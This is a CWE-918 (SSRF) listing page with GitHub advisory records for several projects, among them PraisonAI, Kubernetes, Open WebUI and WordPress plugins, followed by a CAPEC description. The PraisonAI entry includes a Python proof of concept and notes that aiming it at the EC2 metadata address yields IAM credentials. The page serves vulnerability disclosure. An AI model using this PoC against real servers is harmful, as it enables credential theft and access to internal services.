CWE-918
AllowedServer-Side Request Forgery (SSRF)
Abstraction: Base · Status: Incomplete
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
4620 vulnerabilities reference this CWE, most recent first.
GHSA-X63R-JX45-482M
Vulnerability from github – Published: 2026-03-09 18:31 – Updated: 2026-03-11 15:31An issue pertaining to CWE-918: Server-Side Request Forgery was discovered in oslabs-beta ThermaKube master.
{
"affected": [],
"aliases": [
"CVE-2025-70042"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-09T16:16:15Z",
"severity": "CRITICAL"
},
"details": "An issue pertaining to CWE-918: Server-Side Request Forgery was discovered in oslabs-beta ThermaKube master.",
"id": "GHSA-x63r-jx45-482m",
"modified": "2026-03-11T15:31:36Z",
"published": "2026-03-09T18:31:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70042"
},
{
"type": "WEB",
"url": "https://gist.github.com/zcxlighthouse/5a6d15611456de619e4be36f7d2a0ee7"
},
{
"type": "WEB",
"url": "https://github.com/oslabs-beta"
},
{
"type": "WEB",
"url": "https://github.com/oslabs-beta/ThermaKube"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X698-9G95-CHP7
Vulnerability from github – Published: 2023-06-08 21:30 – Updated: 2024-04-04 04:40Pydio Cells through 4.1.2 allows SSRF. For longer running processes, Pydio Cells allows for the creation of jobs, which are run in the background. The job "remote-download" can be used to cause the backend to send a HTTP GET request to a specified URL and save the response to a new file. The response file is then available in a user-specified folder in Pydio Cells.
{
"affected": [],
"aliases": [
"CVE-2023-32750"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-08T21:15:17Z",
"severity": "MODERATE"
},
"details": "Pydio Cells through 4.1.2 allows SSRF. For longer running processes, Pydio Cells allows for the creation of jobs, which are run in the background. The job \"remote-download\" can be used to cause the backend to send a HTTP GET request to a specified URL and save the response to a new file. The response file is then available in a user-specified folder in Pydio Cells.",
"id": "GHSA-x698-9g95-chp7",
"modified": "2024-04-04T04:40:57Z",
"published": "2023-06-08T21:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32750"
},
{
"type": "WEB",
"url": "https://www.redteam-pentesting.de/advisories/rt-sa-2023-005"
},
{
"type": "WEB",
"url": "https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-X6F8-H6VP-666P
Vulnerability from github – Published: 2025-08-26 00:31 – Updated: 2025-08-26 18:31Rebuild v3.7.7 was discovered to contain a Server-Side Request Forgery (SSRF) via the type parameter in the com.rebuild.web.admin.rbstore.RBStoreController#loadDataIndex method.
{
"affected": [],
"aliases": [
"CVE-2024-46413"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-25T15:15:35Z",
"severity": "MODERATE"
},
"details": "Rebuild v3.7.7 was discovered to contain a Server-Side Request Forgery (SSRF) via the type parameter in the com.rebuild.web.admin.rbstore.RBStoreController#loadDataIndex method.",
"id": "GHSA-x6f8-h6vp-666p",
"modified": "2025-08-26T18:31:14Z",
"published": "2025-08-26T00:31:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46413"
},
{
"type": "WEB",
"url": "https://github.com/RacerZ-fighting/CVE-vulns/blob/main/rebuild%203.7.7.md"
},
{
"type": "WEB",
"url": "https://github.com/RacerZ-fighting/rebuild-vulns/blob/main/rebuild%203.7.7.md"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-X6M9-GXVR-7JPV
Vulnerability from github – Published: 2026-04-01 23:21 – Updated: 2026-04-06 22:54Summary
passthrough() and apassthrough() in praisonai accept a caller-controlled api_base parameter that is concatenated with endpoint and passed directly to httpx.Client.request() when the litellm primary path raises AttributeError. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server.
Details
passthrough.py:92 (source) -> passthrough.py:109 (fallback trigger) -> passthrough.py:110 (sink)
# source -- api_base taken directly from caller
def passthrough(endpoint, api_base=None, method="GET", ...):
# fallback trigger -- AttributeError from unrecognised provider enters fallback
except AttributeError:
url = f"{api_base or 'https://api.openai.com'}{endpoint}"
# sink -- no validation before request
response = client.request(method, url=url, ...)
PoC
# tested on: praisonai 1.5.87 (source install)
# install: pip install -e src/praisonai
# start listener: python3 -m http.server 8888
import sys, litellm
sys.path.insert(0, 'src/praisonai')
del litellm.llm_passthrough_route
from praisonai.capabilities.passthrough import passthrough
result = passthrough(
endpoint="/ssrf-test",
api_base="http://127.0.0.1:8888",
method="GET",
custom_llm_provider="__nonexistent__",
)
print(result)
# expected output: PassthroughResult(data='...', status_code=404, headers={'server': 'SimpleHTTP/0.6 Python/3.12.3', ...})
# listener logs: "GET /ssrf-test HTTP/1.1" 404
# on EC2 with IMDSv1: api_base="http://169.254.169.254" returns IAM credentials
Impact
On cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service. Internal services (Redis, Elasticsearch, Kubernetes API) are reachable without authentication from within the VPC. The Flask API server deploys with AUTH_ENABLED = False by default, making this reachable over the network without credentials.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.5.89"
},
"package": {
"ecosystem": "PyPI",
"name": "praisonai"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.90"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34936"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T23:21:45Z",
"nvd_published_at": "2026-04-03T23:17:05Z",
"severity": "HIGH"
},
"details": "### Summary\n\n`passthrough()` and `apassthrough()` in `praisonai` accept a caller-controlled `api_base` parameter that is concatenated with `endpoint` and passed directly to `httpx.Client.request()` when the litellm primary path raises `AttributeError`. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server.\n\n### Details\n\n`passthrough.py:92` (source) -\u003e `passthrough.py:109` (fallback trigger) -\u003e `passthrough.py:110` (sink)\n```python\n# source -- api_base taken directly from caller\ndef passthrough(endpoint, api_base=None, method=\"GET\", ...):\n\n# fallback trigger -- AttributeError from unrecognised provider enters fallback\nexcept AttributeError:\n url = f\"{api_base or \u0027https://api.openai.com\u0027}{endpoint}\"\n\n# sink -- no validation before request\n response = client.request(method, url=url, ...)\n```\n\n### PoC\n```python\n# tested on: praisonai 1.5.87 (source install)\n# install: pip install -e src/praisonai\n# start listener: python3 -m http.server 8888\nimport sys, litellm\nsys.path.insert(0, \u0027src/praisonai\u0027)\ndel litellm.llm_passthrough_route\n\nfrom praisonai.capabilities.passthrough import passthrough\n\nresult = passthrough(\n endpoint=\"/ssrf-test\",\n api_base=\"http://127.0.0.1:8888\",\n method=\"GET\",\n custom_llm_provider=\"__nonexistent__\",\n)\nprint(result)\n# expected output: PassthroughResult(data=\u0027...\u0027, status_code=404, headers={\u0027server\u0027: \u0027SimpleHTTP/0.6 Python/3.12.3\u0027, ...})\n# listener logs: \"GET /ssrf-test HTTP/1.1\" 404\n# on EC2 with IMDSv1: api_base=\"http://169.254.169.254\" returns IAM credentials\n```\n\n### Impact\n\nOn cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service. Internal services (Redis, Elasticsearch, Kubernetes API) are reachable without authentication from within the VPC. The Flask API server deploys with `AUTH_ENABLED = False` by default, making this reachable over the network without credentials.",
"id": "GHSA-x6m9-gxvr-7jpv",
"modified": "2026-04-06T22:54:03Z",
"published": "2026-04-01T23:21:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x6m9-gxvr-7jpv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34936"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI: SSRF via Unvalidated api_base in passthrough() Fallback"
}
GHSA-X6MJ-W4JF-JMGW
Vulnerability from github – Published: 2022-02-15 01:57 – Updated: 2023-09-18 22:44The Kubernetes kube-controller-manager in versions v1.0-1.14, versions prior to v1.15.12, v1.16.9, v1.17.5, and version v1.18.0 are vulnerable to a Server Side Request Forgery (SSRF) that allows certain authorized users to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master's host network (such as link-local or loopback services).
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "k8s.io/kubernetes"
},
"ranges": [
{
"events": [
{
"introduced": "1.18.0"
},
{
"fixed": "1.18.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "k8s.io/kubernetes"
},
"ranges": [
{
"events": [
{
"introduced": "1.17.0"
},
{
"fixed": "1.17.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "k8s.io/kubernetes"
},
"ranges": [
{
"events": [
{
"introduced": "1.16.0"
},
{
"fixed": "1.16.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "k8s.io/kubernetes"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.15.12"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-8555"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-13T20:13:43Z",
"nvd_published_at": "2020-06-05T17:15:00Z",
"severity": "MODERATE"
},
"details": "The Kubernetes kube-controller-manager in versions v1.0-1.14, versions prior to v1.15.12, v1.16.9, v1.17.5, and version v1.18.0 are vulnerable to a Server Side Request Forgery (SSRF) that allows certain authorized users to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master\u0027s host network (such as link-local or loopback services).",
"id": "GHSA-x6mj-w4jf-jmgw",
"modified": "2023-09-18T22:44:56Z",
"published": "2022-02-15T01:57:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8555"
},
{
"type": "WEB",
"url": "https://github.com/kubernetes/kubernetes/issues/91542"
},
{
"type": "WEB",
"url": "https://github.com/kubernetes/kubernetes/pull/89794"
},
{
"type": "WEB",
"url": "https://groups.google.com/d/topic/kubernetes-security-announce/kEK27tqqs30/discussion"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3SOCLOPTSYABTE4CLTSPDIFE6ZZZR4LX"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20200724-0005"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2020/06/01/4"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/05/04/8"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Server Side Request Forgery (SSRF) in Kubernetes"
}
GHSA-X6V9-4FG2-25CW
Vulnerability from github – Published: 2023-09-16 09:30 – Updated: 2024-04-04 07:42The Dropbox Folder Share plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 1.9.7 via the 'link' parameter. This can allow unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
{
"affected": [],
"aliases": [
"CVE-2023-3025"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-09-16T09:15:07Z",
"severity": "HIGH"
},
"details": "The Dropbox Folder Share plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 1.9.7 via the \u0027link\u0027 parameter. This can allow unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.",
"id": "GHSA-x6v9-4fg2-25cw",
"modified": "2024-04-04T07:42:49Z",
"published": "2023-09-16T09:30:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3025"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/dropbox-folder-share/trunk/HynoTech/DropboxFolderShare/Principal.php#L118"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d62bd2bd-db01-479f-89e4-8031d69a912f?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-X757-HV69-JR45
Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-21 21:16The /openai/models endpoint in open-webui/open-webui version 0.3.8 is vulnerable to Server-Side Request Forgery (SSRF). An attacker can change the OpenAI URL to any URL without checks, causing the endpoint to send a request to the specified URL and return the output. This vulnerability allows the attacker to access internal services and potentially gain command execution by accessing instance secrets.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.3.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-7959"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-21T21:16:29Z",
"nvd_published_at": "2025-03-20T10:15:38Z",
"severity": "HIGH"
},
"details": "The `/openai/models` endpoint in open-webui/open-webui version 0.3.8 is vulnerable to Server-Side Request Forgery (SSRF). An attacker can change the OpenAI URL to any URL without checks, causing the endpoint to send a request to the specified URL and return the output. This vulnerability allows the attacker to access internal services and potentially gain command execution by accessing instance secrets.",
"id": "GHSA-x757-hv69-jr45",
"modified": "2025-03-21T21:16:29Z",
"published": "2025-03-20T12:32:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7959"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/3c8bea0a-d678-4d67-bb9c-2b5b610a2193"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI has SSRF in /openai/models"
}
GHSA-X77X-2WJM-8X4R
Vulnerability from github – Published: 2026-03-10 18:31 – Updated: 2026-03-10 18:31SAP NetWeaver Application Server for ABAP provides an ABAP Report for testing purposes, which allows to send HTTP requests to arbitrary internal or external endpoints. The report is therefore vulnerable to Server-Side Request Forgery (SSRF). Successful exploitation could lead to interaction with potentially sensitive internal endpoints, resulting in a low impact on data confidentiality and integrity. There is no impact on availability of the application.
{
"affected": [],
"aliases": [
"CVE-2026-24316"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-10T17:35:55Z",
"severity": "MODERATE"
},
"details": "SAP NetWeaver Application Server for ABAP provides an ABAP Report for testing purposes, which allows to send HTTP requests to arbitrary internal or external endpoints. The report is therefore vulnerable to Server-Side Request Forgery (SSRF). Successful exploitation could lead to interaction with potentially sensitive internal endpoints, resulting in a low impact on data confidentiality and integrity. There is no impact on availability of the application.",
"id": "GHSA-x77x-2wjm-8x4r",
"modified": "2026-03-10T18:31:16Z",
"published": "2026-03-10T18:31:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24316"
},
{
"type": "WEB",
"url": "https://me.sap.com/notes/3689080"
},
{
"type": "WEB",
"url": "https://url.sap/sapsecuritypatchday"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-X78J-X58J-M4H8
Vulnerability from github – Published: 2026-05-04 06:32 – Updated: 2026-05-04 06:32A security flaw has been discovered in pixelsock directus-mcp 1.0.0. This issue affects the function validateUrl of the file index.ts of the component MCP Interface. Performing a manipulation of the argument fileUrl results in server-side request forgery. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The pull request to fix this issue awaits acceptance.
{
"affected": [],
"aliases": [
"CVE-2026-7729"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-04T05:16:01Z",
"severity": "LOW"
},
"details": "A security flaw has been discovered in pixelsock directus-mcp 1.0.0. This issue affects the function validateUrl of the file index.ts of the component MCP Interface. Performing a manipulation of the argument fileUrl results in server-side request forgery. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The pull request to fix this issue awaits acceptance.",
"id": "GHSA-x78j-x58j-m4h8",
"modified": "2026-05-04T06:32:02Z",
"published": "2026-05-04T06:32:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7729"
},
{
"type": "WEB",
"url": "https://github.com/BruceJqs/public_exp/issues/36"
},
{
"type": "WEB",
"url": "https://github.com/pixelsock/directus-mcp/issues/13"
},
{
"type": "WEB",
"url": "https://github.com/pixelsock/directus-mcp/pull/14"
},
{
"type": "WEB",
"url": "https://github.com/pixelsock/directus-mcp"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/807539"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/360904"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/360904/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-X7F7-7836-W8H5
Vulnerability from github – Published: 2026-03-28 06:30 – Updated: 2026-03-28 06:30The Oxygen Theme theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.0.8 via the laborator_calc_route AJAX action. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
{
"affected": [],
"aliases": [
"CVE-2025-12886"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-28T04:16:49Z",
"severity": "HIGH"
},
"details": "The Oxygen Theme theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.0.8 via the laborator_calc_route AJAX action. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.",
"id": "GHSA-x7f7-7836-w8h5",
"modified": "2026-03-28T06:30:24Z",
"published": "2026-03-28T06:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12886"
},
{
"type": "WEB",
"url": "https://documentation.laborator.co/kb/oxygen/oxygen-release-notes"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8c83f430-8a4d-40fa-890c-387c787a3b55?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.